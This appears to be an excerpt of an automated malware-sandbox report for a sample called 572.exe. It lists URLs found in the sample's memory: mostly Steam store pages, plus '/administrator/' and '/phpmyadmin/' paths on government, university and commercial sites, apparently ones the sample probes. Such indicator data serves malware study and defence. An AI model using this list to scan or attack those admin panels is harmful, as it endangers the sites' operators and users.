                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/soundtracks?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/specials/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A90000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/specials?snr=1_4_4_#tab=TopSellers
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/specials?snr=1_4_4__125#tab=TopSellers
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/specials?snr=1_4_4__tabsmore#tab=TopSellers
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/?snr=1_4_4__global-header
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/?snr=1_4_4__global-responsive-menu
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/?snr=1_44_44_
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/?snr=1_4_4__global-responsive-menu
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steamdeck/?snr=1_4_4__category-menu
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steamdeckdock/?snr=1_4_4__125
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/sub/13435/?snr=1_4_4__tab-Specials
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/sub/199943/?snr=1_4_4__tab-Specials
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/sub/354231/?snr=1_4_4__147
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/sub/376282/?snr=1_4_4__tab-Specials
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/sub/626153/?snr=1_4_4__tab-Specials
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/?snr=1_44_44_
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/?snr=1_4_4__global-responsive-menu
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/tag/browse/?snr=1_4_4__125#yours
                Source: 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464256901.0000000063ABB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/tag/browse/?snr=1_4_4__146
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/tags/en/Action/?snr=1_4_4__125
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/tags/en/Adventure/?snr=1_4_4__125
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/tags/en/Casual/?snr=1_4_4__125
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/tags/en/Indie/?snr=1_4_4__125
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/tags/en/Massively%20Multiplayer/?snr=1_4_4__125
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/tags/en/RPG/?snr=1_4_4__125
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/tags/en/Racing/?snr=1_4_4__125
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/tags/en/Simulation/?snr=1_4_4__125
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/tags/en/Sports/?snr=1_4_4__125
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/tags/en/Strategy/?snr=1_4_4__125
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/vr/?snr=1_4_4_
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/vr/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/vr/?snr=1_4_4__125
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/vrhardware/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/vrhardware/?snr=1_4_4__125
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/yearinreview?src=7&snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://story.snapchat.com
                Source: 572.exe, 00000009.00000003.4359155802.0000000040317000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://student.emis.gov.eg/administrator/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://student.emis.gov.eg/administrator/comL
                Source: 572.exe, 00000009.00000003.4003323359.000000003911E000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4199132686.000000003911E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://student.emis.gov.eg/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4308254495.00000000315E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/mail/?p=NoSuchUser
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.zoom.us/hc/articles/16542703332621
                Source: 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040284000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004027C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.zoom.us/hc/en-us
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.zoom.us/hc/en-us/sections/4415044540045-Billing-and-Payments
                Source: 572.exe, 00000009.00000003.4513550067.000000004E073000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://terna.net
                Source: 572.exe, 00000009.00000003.4557444059.0000000012BFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://testconnect.garena.com/administrator/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://testconnect.garena.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://testconnect.garena.com/phpmyadmin/Rx
                Source: 572.exe, 00000009.00000003.4309603552.000000004E5F3000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4315918557.000000004E194000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiktok.com/administrator/index.php
                Source: 572.exe, 00000009.00000003.4309603552.000000004E5F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiktok.com/administrator/index.phps
                Source: 572.exe, 00000009.00000003.4306089773.000000004E73A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tongxunlu.baidu.com
                Source: 572.exe, 00000009.00000003.4101727130.000000004E6AC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tr.bongacams.com/phpmyadmin
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tr.snapchat.com
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tr.snapchat.com/config/com/49966cac-c23c-49c7-9ff9-c7f8f6f771ba.js;
                Source: 572.exe, 00000009.00000003.4288860252.0000000063FF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://trilce.ucv.edu.pe/signin/usernamerecovery.aspx
                Source: 572.exe, 00000009.00000003.4184636529.0000000047AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/caixa
                Source: 572.exe, 00000009.00000003.4373730161.0000000063DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/warriorplus
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/zoom
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ucivirtual.uci.edu.mx/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ucivirtual.uci.edu.mx/phpmyadmin/p
                Source: 572.exe, 00000009.00000003.4347804108.000000004E457000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ucv.blackboard.com/administrator/
                Source: 572.exe, 00000009.00000003.4304769446.00000000402DA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4262755230.0000000063EF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ucv.blackboard.com/bbcswebdav/institution/2-Campus%20Ate.png);
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4485883302.000000004DF19000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ucv.blackboard.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ucv.blackboard.com/phpmyadmin/9y:
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ucv.blackboard.com/phpmyadmin/nonce.ajax
                Source: 572.exe, 00000009.00000003.4337138614.000000004DBC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uh.is/administrator/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ukr.bongacams.com/phpmyadmin
                Source: 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://unpkg.com/silvermine-videojs-quality-selector
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upsconline.nic.in/administrator/
                Source: 572.exe, 00000009.00000003.4347804108.000000004E509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upsconline.nic.in/phpmyadmin/
